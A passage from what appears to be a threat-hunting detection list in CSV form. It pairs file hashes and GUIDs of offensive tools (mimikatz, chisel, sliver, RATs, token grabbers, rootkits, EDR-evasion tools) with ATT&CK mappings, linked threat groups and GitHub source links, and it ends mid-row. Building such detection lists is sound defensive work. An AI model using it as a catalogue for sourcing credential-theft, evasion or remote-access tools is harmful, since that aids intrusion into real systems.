"*6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06*",".{0,1000}6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28653" "*6ef7a5a0d7eb7976141aa9d61242969b0dee3e8a7dddb6259c1bd539b68dcad8*",".{0,1000}6ef7a5a0d7eb7976141aa9d61242969b0dee3e8a7dddb6259c1bd539b68dcad8.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","28654" "*6ef83e490ccff661262cb10a37850b957ceb1da55a680321e1d354bf7a036c10*",".{0,1000}6ef83e490ccff661262cb10a37850b957ceb1da55a680321e1d354bf7a036c10.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","28655" "*6ef8c3bbcd03ba52b59a3f6115c6fba39e9578c0f2c6379f17a6f421f944e1fa*",".{0,1000}6ef8c3bbcd03ba52b59a3f6115c6fba39e9578c0f2c6379f17a6f421f944e1fa.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28656" "*6ef90637f19f9be257697a77dada7d97a1655705e821aa4b51eda2eed6e8751f*",".{0,1000}6ef90637f19f9be257697a77dada7d97a1655705e821aa4b51eda2eed6e8751f.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","28657" "*6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f*",".{0,1000}6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28659" "*6EFFA73B-AB71-4594-AEFF-1C127387A9CE*",".{0,1000}6EFFA73B\-AB71\-4594\-AEFF\-1C127387A9CE.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","28661" "*6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5*",".{0,1000}6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28664" "*6f14aa417bc4b85c47ef65bfed84e2b7728b1cb8bdd1c0cfc6eb6cd7fd0db7c0*",".{0,1000}6f14aa417bc4b85c47ef65bfed84e2b7728b1cb8bdd1c0cfc6eb6cd7fd0db7c0.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","28666" "*6f1799422f0ccd2417e550b20fec04fcc7f1d9ec78aaa1415456b3068f673f6b*",".{0,1000}6f1799422f0ccd2417e550b20fec04fcc7f1d9ec78aaa1415456b3068f673f6b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28667" "*6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18*",".{0,1000}6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28668" "*6f27c494cd5373780458b9ed4ccf9bb172f1782e8e2c1dc630793dfe26ea82fe*",".{0,1000}6f27c494cd5373780458b9ed4ccf9bb172f1782e8e2c1dc630793dfe26ea82fe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28670" "*6f2a53476cbc09bbffe7e07d6e9dd19d*",".{0,1000}6f2a53476cbc09bbffe7e07d6e9dd19d.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","28671" "*6f2b8cefcfe918b0e6ae0449e03ee2bc0cfe9224dff57271478ebb5110965ffd*",".{0,1000}6f2b8cefcfe918b0e6ae0449e03ee2bc0cfe9224dff57271478ebb5110965ffd.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#filehash","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","28672" "*6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e*",".{0,1000}6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28673" "*6f3476967a8ef65e491229af8ddfb6a9958a346f151b9bce48122e1a04b97539*",".{0,1000}6f3476967a8ef65e491229af8ddfb6a9958a346f151b9bce48122e1a04b97539.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","28674" 
"*6F3899086ACCAB2E2686ADB078E049066754D0EE7798666042416CEF566F65E0*",".{0,1000}6F3899086ACCAB2E2686ADB078E049066754D0EE7798666042416CEF566F65E0.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","28677" "*6f3c6aacdcbeacc32a31e6ad49ac47e3f9d315ef277fe75125f7e596b592310e*",".{0,1000}6f3c6aacdcbeacc32a31e6ad49ac47e3f9d315ef277fe75125f7e596b592310e.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#filehash","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","28679" "*6f430900ee17bc63c79e6c42bfff16829205948b1e136bd4bc6d02301ba09d76*",".{0,1000}6f430900ee17bc63c79e6c42bfff16829205948b1e136bd4bc6d02301ba09d76.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","28680" "*6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d*",".{0,1000}6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#filehash","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","28682" "*6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7*",".{0,1000}6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","28684" "*6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45*",".{0,1000}6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28685" "*6f50af68f58de6c48f47a2a00823fdbf03fb76b448d6400d7522296c26cd1f55*",".{0,1000}6f50af68f58de6c48f47a2a00823fdbf03fb76b448d6400d7522296c26cd1f55.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28688" "*6f58574cdb2d60ccd01fb4e72d1a03de02dd4992858f8ebbb74cb40d543ebbe9*",".{0,1000}6f58574cdb2d60ccd01fb4e72d1a03de02dd4992858f8ebbb74cb40d543ebbe9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28690" "*6f71c0c87c5593fe851b54e638e9c242e429018eee80fce80a1fd2793227bcb8*",".{0,1000}6f71c0c87c5593fe851b54e638e9c242e429018eee80fce80a1fd2793227bcb8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source 
information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28693" "*6f7204e9f37025c754fd990061bda4246aa63d13e4f9fe951c7a2871c2ecf5f5*",".{0,1000}6f7204e9f37025c754fd990061bda4246aa63d13e4f9fe951c7a2871c2ecf5f5.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","28694" "*6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04*",".{0,1000}6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#filehash","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","28695" "*6f80905117b3415c1a1a964d77a273402c3c80952715254b09e26d3a70fbff7c*",".{0,1000}6f80905117b3415c1a1a964d77a273402c3c80952715254b09e26d3a70fbff7c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28696" "*6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190*",".{0,1000}6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - 
Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28697" "*6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029*",".{0,1000}6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","28698" "*6f82b7afdaff95ea893b1dda21edf5b091a186a2ec9f2883954f8a9eba5c75fa*",".{0,1000}6f82b7afdaff95ea893b1dda21edf5b091a186a2ec9f2883954f8a9eba5c75fa.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28699" "*6f83bb55a9762c656e90c49fd505ba79414edf22a89a4029f96a6ff784716e29*",".{0,1000}6f83bb55a9762c656e90c49fd505ba79414edf22a89a4029f96a6ff784716e29.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","28700" 
"*6f86663035843349077fe85bb9b7b912b4cf9f6334df6e8da098d4750cee871c*",".{0,1000}6f86663035843349077fe85bb9b7b912b4cf9f6334df6e8da098d4750cee871c.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28701" "*6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea*",".{0,1000}6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28702" "*6f919785361c350dd35b21573e02f681806645c50da3e98ddc703d2efa838dd6*",".{0,1000}6f919785361c350dd35b21573e02f681806645c50da3e98ddc703d2efa838dd6.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","#filehash","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","28703" 
"*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*",".{0,1000}6F99CB40\-8FEF\-4B63\-A35D\-9CEEC71F7B5F.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28706" "*6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85*",".{0,1000}6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28710" "*6fad3a96fe407982818ce27f73c78b8ac3b0902bd85f104dc85eef092f4186de*",".{0,1000}6fad3a96fe407982818ce27f73c78b8ac3b0902bd85f104dc85eef092f4186de.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28711" "*6fb86b256e278c854acf21be16797fb8d774759982cd3251ffda758260dffd44*",".{0,1000}6fb86b256e278c854acf21be16797fb8d774759982cd3251ffda758260dffd44.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository 
of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","28713" "*6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4*",".{0,1000}6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28714" "*6FC09BDB-365F-4691-BBD9-CB7F69C9527A*",".{0,1000}6FC09BDB\-365F\-4691\-BBD9\-CB7F69C9527A.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","28715" "*6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736*",".{0,1000}6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28716" "*6fce39600a4115976300ac936a140aa10387d0b4268bbd0cba74dd7f8775b844*",".{0,1000}6fce39600a4115976300ac936a140aa10387d0b4268bbd0cba74dd7f8775b844.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28717" "*6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44*",".{0,1000}6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","28718" "*6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba*",".{0,1000}6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - 
Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28719" "*6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba*",".{0,1000}6fd569e4c0b8bb63b28317f10ca965d4921b126f601ce72824e40f71465b03ba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore 